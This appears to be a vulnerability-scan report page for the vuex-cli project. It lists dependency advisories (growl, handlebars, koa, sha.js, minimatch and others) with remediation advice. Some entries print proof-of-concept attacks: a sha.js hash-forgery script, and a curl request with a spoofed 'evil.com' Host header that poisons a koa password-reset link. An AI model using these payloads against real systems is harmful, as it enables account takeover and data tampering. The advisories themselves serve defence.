Vulnerabilities

100 via 619 paths

Dependencies

1085

Source

GitHub

Find, fix and prevent vulnerabilities in your code.

Severity
  • 6
  • 41
  • 44
  • 9
Status
  • 100
  • 0
  • 0

critical severity

Command Injection

  • Vulnerable module: growl
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 mocha@2.5.3 growl@1.9.2

Overview

growl is a package adding Growl support for Nodejs.

Affected versions of this package are vulnerable to Command Injection due to unsafe use of the eval() function. Node.js provides the eval() function by default, and is used to translate strings into Javascript code. An attacker can craft a malicious payload to inject arbitrary commands.

Remediation

Upgrade growl to version 1.10.0 or higher.

References

critical severity

Prototype Pollution

  • Vulnerable module: handlebars
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-url@5.1.2 directory-encoder@0.7.2 handlebars@1.3.0

Overview

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Prototype Pollution. It is possible to add or modify properties to the Object prototype through a malicious template. This may allow attackers to crash the application or execute Arbitrary Code in specific conditions.

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as _proto_, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named _proto_ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to _proto_.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Oliver. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade handlebars to version 3.0.8, 4.5.3 or higher.

References

critical severity

Improper Input Validation

  • Vulnerable module: xmldom
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-url@5.1.2 directory-encoder@0.7.2 img-stats@0.5.2 xmldom@0.1.31

Overview

xmldom is an A pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module.

Affected versions of this package are vulnerable to Improper Input Validation due to parsing XML that is not well-formed, and contains multiple top-level elements. All the root nodes are being added to the childNodes collection of the Document, without reporting or throwing any error.

Workarounds

One of the following approaches might help, depending on your use case:

  1. Instead of searching for elements in the whole DOM, only search in the documentElement.

  2. Reject a document with a document that has more than 1 childNode.

PoC

var DOMParser = require('xmldom').DOMParser;
var xmlData = '<?xml version="1.0" encoding="UTF-8"?>\n' +
'<root>\n' +
'  <branch girth="large">\n' +
'    <leaf color="green" />\n' +
'  </branch>\n' +
'</root>\n' +
'<root>\n' +
'  <branch girth="twig">\n' +
'    <leaf color="gold" />\n' +
'  </branch>\n' +
'</root>\n';
var xmlDOM = new DOMParser().parseFromString(xmlData);
console.log(xmlDOM.toString());

This will result with the following output:

<?xml version="1.0" encoding="UTF-8"?><root>
  <branch girth="large">
    <leaf color="green"/>
  </branch>
</root>
<root>
  <branch girth="twig">
    <leaf color="gold"/>
  </branch>
</root>

Remediation

There is no fixed version for xmldom.

References

critical severity

Predictable Value Range from Previous Values

  • Vulnerable module: form-data
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 codecov@1.0.1 request@2.88.2 form-data@2.3.3
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 koa-proxy@0.6.0 co-request@0.2.1 request@2.88.2 form-data@2.3.3
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 request@2.88.2 form-data@2.3.3
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 jspm-github@0.14.14 request@2.88.2 form-data@2.3.3
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 jspm-npm@0.30.5 request@2.88.2 form-data@2.3.3

Overview

Affected versions of this package are vulnerable to Predictable Value Range from Previous Values via the boundary value, which uses Math.random(). An attacker can manipulate HTTP request boundaries by exploiting predictable values, potentially leading to HTTP parameter pollution.

Remediation

Upgrade form-data to version 2.5.4, 3.0.4, 4.0.4 or higher.

References

critical severity

Incomplete List of Disallowed Inputs

  • Vulnerable module: babel-traverse
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-core@6.26.3 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-core@6.26.3 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-register@6.26.0 babel-core@6.26.3 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-cli@6.26.0 babel-core@6.26.3 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-plugin-transform-async-to-generator@6.24.1 babel-helper-remap-async-to-generator@6.24.1 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-es2015@6.24.1 babel-plugin-transform-es2015-block-scoping@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-es2015@6.24.1 babel-plugin-transform-es2015-classes@6.24.1 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-es2015@6.24.1 babel-plugin-transform-es2015-parameters@6.24.1 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-core@6.26.3 babel-helpers@6.24.1 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-register@6.26.0 babel-core@6.26.3 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-cli@6.26.0 babel-core@6.26.3 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-plugin-transform-async-to-generator@6.24.1 babel-helper-remap-async-to-generator@6.24.1 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-es2015@6.24.1 babel-plugin-transform-es2015-block-scoping@6.26.0 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-es2015@6.24.1 babel-plugin-transform-es2015-classes@6.24.1 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-es2015@6.24.1 babel-plugin-transform-es2015-computed-properties@6.24.1 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-es2015@6.24.1 babel-plugin-transform-es2015-modules-commonjs@6.26.2 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-es2015@6.24.1 babel-plugin-transform-es2015-modules-amd@6.24.1 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-es2015@6.24.1 babel-plugin-transform-es2015-modules-systemjs@6.24.1 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-es2015@6.24.1 babel-plugin-transform-es2015-modules-umd@6.24.1 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-es2015@6.24.1 babel-plugin-transform-es2015-parameters@6.24.1 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-core@6.26.3 babel-register@6.26.0 babel-core@6.26.3 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-cli@6.26.0 babel-register@6.26.0 babel-core@6.26.3 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-plugin-transform-async-to-generator@6.24.1 babel-helper-remap-async-to-generator@6.24.1 babel-helper-function-name@6.24.1 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-es2015@6.24.1 babel-plugin-transform-es2015-classes@6.24.1 babel-helper-function-name@6.24.1 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-es2015@6.24.1 babel-plugin-transform-es2015-function-name@6.24.1 babel-helper-function-name@6.24.1 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-es2015@6.24.1 babel-plugin-transform-es2015-classes@6.24.1 babel-helper-replace-supers@6.24.1 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-es2015@6.24.1 babel-plugin-transform-es2015-object-super@6.24.1 babel-helper-replace-supers@6.24.1 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-es2015@6.24.1 babel-plugin-transform-es2015-parameters@6.24.1 babel-helper-call-delegate@6.24.1 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-register@6.26.0 babel-core@6.26.3 babel-helpers@6.24.1 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-cli@6.26.0 babel-core@6.26.3 babel-helpers@6.24.1 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-core@6.26.3 babel-register@6.26.0 babel-core@6.26.3 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-cli@6.26.0 babel-register@6.26.0 babel-core@6.26.3 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-plugin-transform-async-to-generator@6.24.1 babel-helper-remap-async-to-generator@6.24.1 babel-helper-function-name@6.24.1 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-es2015@6.24.1 babel-plugin-transform-es2015-classes@6.24.1 babel-helper-function-name@6.24.1 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-es2015@6.24.1 babel-plugin-transform-es2015-function-name@6.24.1 babel-helper-function-name@6.24.1 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-es2015@6.24.1 babel-plugin-transform-es2015-classes@6.24.1 babel-helper-replace-supers@6.24.1 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-es2015@6.24.1 babel-plugin-transform-es2015-object-super@6.24.1 babel-helper-replace-supers@6.24.1 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-es2015@6.24.1 babel-plugin-transform-es2015-modules-amd@6.24.1 babel-plugin-transform-es2015-modules-commonjs@6.26.2 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-es2015@6.24.1 babel-plugin-transform-es2015-modules-umd@6.24.1 babel-plugin-transform-es2015-modules-amd@6.24.1 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-stage-0@6.24.1 babel-preset-stage-1@6.24.1 babel-plugin-transform-class-constructor-call@6.24.1 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-es2015@6.24.1 babel-plugin-transform-es2015-classes@6.24.1 babel-helper-define-map@6.26.0 babel-helper-function-name@6.24.1 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-core@6.26.3 babel-register@6.26.0 babel-core@6.26.3 babel-helpers@6.24.1 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-cli@6.26.0 babel-register@6.26.0 babel-core@6.26.3 babel-helpers@6.24.1 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-es2015@6.24.1 babel-plugin-transform-es2015-classes@6.24.1 babel-helper-define-map@6.26.0 babel-helper-function-name@6.24.1 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-es2015@6.24.1 babel-plugin-transform-es2015-modules-umd@6.24.1 babel-plugin-transform-es2015-modules-amd@6.24.1 babel-plugin-transform-es2015-modules-commonjs@6.26.2 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-stage-0@6.24.1 babel-preset-stage-1@6.24.1 babel-preset-stage-2@6.24.1 babel-plugin-transform-class-properties@6.24.1 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-stage-0@6.24.1 babel-preset-stage-1@6.24.1 babel-preset-stage-2@6.24.1 babel-plugin-transform-decorators@6.24.1 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 systemjs-builder@0.16.13 babel-core@6.26.3 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-stage-0@6.24.1 babel-preset-stage-1@6.24.1 babel-preset-stage-2@6.24.1 babel-plugin-transform-class-properties@6.24.1 babel-helper-function-name@6.24.1 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-stage-0@6.24.1 babel-preset-stage-1@6.24.1 babel-preset-stage-2@6.24.1 babel-plugin-transform-decorators@6.24.1 babel-helper-explode-class@6.24.1 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 systemjs-builder@0.16.13 babel-core@6.26.3 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-stage-0@6.24.1 babel-preset-stage-1@6.24.1 babel-preset-stage-2@6.24.1 babel-plugin-transform-class-properties@6.24.1 babel-helper-function-name@6.24.1 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 systemjs-builder@0.16.13 babel-plugin-transform-es2015-modules-systemjs@6.24.1 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 systemjs-builder@0.16.13 babel-plugin-transform-amd-system-wrapper@0.3.7 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 systemjs-builder@0.16.13 babel-plugin-transform-cjs-system-wrapper@0.6.2 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 systemjs-builder@0.16.13 babel-plugin-transform-global-system-wrapper@0.3.4 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-stage-0@6.24.1 babel-preset-stage-1@6.24.1 babel-preset-stage-2@6.24.1 babel-preset-stage-3@6.24.1 babel-plugin-transform-async-to-generator@6.24.1 babel-helper-remap-async-to-generator@6.24.1 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-stage-0@6.24.1 babel-preset-stage-1@6.24.1 babel-preset-stage-2@6.24.1 babel-preset-stage-3@6.24.1 babel-plugin-transform-async-generator-functions@6.24.1 babel-helper-remap-async-to-generator@6.24.1 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-stage-0@6.24.1 babel-preset-stage-1@6.24.1 babel-preset-stage-2@6.24.1 babel-plugin-transform-decorators@6.24.1 babel-helper-explode-class@6.24.1 babel-helper-bindify-decorators@6.24.1 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 systemjs-builder@0.16.13 babel-core@6.26.3 babel-helpers@6.24.1 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-stage-0@6.24.1 babel-preset-stage-1@6.24.1 babel-preset-stage-2@6.24.1 babel-preset-stage-3@6.24.1 babel-plugin-transform-async-to-generator@6.24.1 babel-helper-remap-async-to-generator@6.24.1 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-stage-0@6.24.1 babel-preset-stage-1@6.24.1 babel-preset-stage-2@6.24.1 babel-preset-stage-3@6.24.1 babel-plugin-transform-async-generator-functions@6.24.1 babel-helper-remap-async-to-generator@6.24.1 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 systemjs-builder@0.16.13 babel-core@6.26.3 babel-register@6.26.0 babel-core@6.26.3 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-stage-0@6.24.1 babel-preset-stage-1@6.24.1 babel-preset-stage-2@6.24.1 babel-preset-stage-3@6.24.1 babel-plugin-transform-async-to-generator@6.24.1 babel-helper-remap-async-to-generator@6.24.1 babel-helper-function-name@6.24.1 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-stage-0@6.24.1 babel-preset-stage-1@6.24.1 babel-preset-stage-2@6.24.1 babel-preset-stage-3@6.24.1 babel-plugin-transform-async-generator-functions@6.24.1 babel-helper-remap-async-to-generator@6.24.1 babel-helper-function-name@6.24.1 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-stage-0@6.24.1 babel-preset-stage-1@6.24.1 babel-preset-stage-2@6.24.1 babel-preset-stage-3@6.24.1 babel-plugin-transform-exponentiation-operator@6.24.1 babel-helper-builder-binary-assignment-operator-visitor@6.24.1 babel-helper-explode-assignable-expression@6.24.1 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 systemjs-builder@0.16.13 babel-core@6.26.3 babel-register@6.26.0 babel-core@6.26.3 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-stage-0@6.24.1 babel-preset-stage-1@6.24.1 babel-preset-stage-2@6.24.1 babel-preset-stage-3@6.24.1 babel-plugin-transform-async-to-generator@6.24.1 babel-helper-remap-async-to-generator@6.24.1 babel-helper-function-name@6.24.1 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-preset-stage-0@6.24.1 babel-preset-stage-1@6.24.1 babel-preset-stage-2@6.24.1 babel-preset-stage-3@6.24.1 babel-plugin-transform-async-generator-functions@6.24.1 babel-helper-remap-async-to-generator@6.24.1 babel-helper-function-name@6.24.1 babel-template@6.26.0 babel-traverse@6.26.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 systemjs-builder@0.16.13 babel-core@6.26.3 babel-register@6.26.0 babel-core@6.26.3 babel-helpers@6.24.1 babel-template@6.26.0 babel-traverse@6.26.0

Overview

Affected versions of this package are vulnerable to Incomplete List of Disallowed Inputs when using plugins that rely on the path.evaluate() or path.evaluateTruthy() internal Babel methods.

Note:

This is only exploitable if the attacker uses known affected plugins such as @babel/plugin-transform-runtime, @babel/preset-env when using its useBuiltIns option, and any "polyfill provider" plugin that depends on @babel/helper-define-polyfill-provider. No other plugins under the @babel/ namespace are impacted, but third-party plugins might be.

Users that only compile trusted code are not impacted.

Workaround

Users who are unable to upgrade the library can upgrade the affected plugins instead, to avoid triggering the vulnerable code path in affected @babel/traverse.

Remediation

There is no fixed version for babel-traverse.

References

critical severity

Function Call With Incorrect Argument Type

  • Vulnerable module: sha.js
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 webpack@1.15.0 node-libs-browser@0.7.0 crypto-browserify@3.3.0 sha.js@2.2.6

Overview

Affected versions of this package are vulnerable to Function Call With Incorrect Argument Type due to missing type checks in the update function in the hash.js file. An attacker can manipulate input data by supplying crafted data that causes a hash rewind and unintended data processing.

PoC

const forgeHash = (data, payload) => JSON.stringify([payload, { length: -payload.length}, [...data]])

const sha = require('sha.js')
const { randomBytes } = require('crypto')

const sha256 = (...messages) => {
  const hash = sha('sha256')
  messages.forEach((m) => hash.update(m))
  return hash.digest('hex')
}

const validMessage = [randomBytes(32), randomBytes(32), randomBytes(32)] // whatever

const payload = forgeHash(Buffer.concat(validMessage), 'Hashed input means safe')
const receivedMessage = JSON.parse(payload) // e.g. over network, whatever

console.log(sha256(...validMessage))
console.log(sha256(...receivedMessage))
console.log(receivedMessage[0])

Remediation

Upgrade sha.js to version 2.4.12 or higher.

References

high severity

HTTP Header Injection

  • Vulnerable module: koa
  • Introduced through: koa@1.7.1

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli koa@1.7.1
    Remediation: Upgrade to koa@2.16.4.

Overview

koa is a Koa web app framework

Affected versions of this package are vulnerable to HTTP Header Injection via the hostname function in the. request.js file. An attacker can manipulate the value hostname by sending a specially crafted HTTP Host header containing an @ symbol, which can lead to the generation of attacker-controlled URLs or influence routing decisions.

PoC

Setup: `` js // server.js const Koa = require('koa'); const app = new Koa();

// Simulates password reset URL generation (common vulnerable pattern) app.use(async ctx => { if (ctx.path === '/forgot-password') { const resetToken = 'abc123securtoken'; const resetUrl = ${ctx.protocol}://${ctx.hostname}/reset?token=${resetToken};

ctx.body = {
  message: 'Password reset link generated',
  resetUrl: resetUrl,
  debug: {
    rawHost: ctx.get('Host'),
    parsedHostname: ctx.hostname,
    origin: ctx.origin,
    protocol: ctx.protocol
  }
};

} });

app.listen(3000, () => console.log('Server on http://localhost:3000'));

Exploit:

curl -H "Host: evil.com:fake@localhost:3000" http://localhost:3000/forgot-password

## Remediation
Upgrade `koa` to version 2.16.4, 3.1.2 or higher.
## References
- [GitHub Commit](https://github.com/koajs/koa/commit/55ab9bab044ead4e82c70a30a4f9dc0fc9c1b6df)
- [GitHub Commit](https://github.com/koajs/koa/commit/b76ddc01fdb703e51652b0fd131d16394cadcfeb)

high severity

Inefficient Algorithmic Complexity

  • Vulnerable module: minimatch
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 mocha@2.5.3 glob@3.2.11 minimatch@0.3.0

Overview

minimatch is a minimal matching utility.

Affected versions of this package are vulnerable to Inefficient Algorithmic Complexity via the matchOne function. An attacker can cause significant delays in processing and stall the event loop by supplying specially crafted glob patterns containing multiple non-adjacent GLOBSTAR segments.

Remediation

Upgrade minimatch to version 3.1.3, 4.2.5, 5.1.8, 6.2.2, 7.4.8, 8.0.6, 9.0.7, 10.2.3 or higher.

References

high severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: minimatch
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 mocha@2.5.3 glob@3.2.11 minimatch@0.3.0

Overview

minimatch is a minimal matching utility.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) in the AST class, caused by catastrophic backtracking when an input string contains many * characters in a row, followed by an unmatched character.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

